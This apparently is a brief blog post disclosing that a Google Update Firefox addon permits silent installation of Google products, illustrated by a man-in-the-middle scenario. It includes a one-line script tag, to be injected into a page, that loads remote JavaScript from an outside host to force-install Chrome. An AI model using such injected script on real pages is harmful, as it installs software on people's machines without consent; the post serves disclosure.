Google Update


If you have installed Google Chrome, or maybe Google Desktop or Google's toolbar, you might be surprised that you have a new Firefox addon, named "Google Update". And just like Microsoft's loveable addon, the Google Update addon opens a hole you probably don't want opened.

Unable to find much documentation on the addon, I did a little investigating myself. The addon allows installation of Google products without any normal confirmation dialogs, such as Google Chrome.

This is a bad idea. For example, in a wireless or MITM scenario, you could drop the following in the head of the google homepage and the latest version of Chrome would be forcibly installed on the system: (I adapted the code from the code on the page here: http://www.google.com/chrome/eula.html that installs Chrome)

<script type="text/javascript" src="http://www.scriptjunkie.us/files/installChrome.js" />

The Gmail voice and video chat and presumably many other Google apps can also be forcibly installed. Chrome's forced auto-updating can be annoying and hated when Chrome is running, so why exactly does Google silently add this to my non-Google browsers?

, , ,

Comments are closed.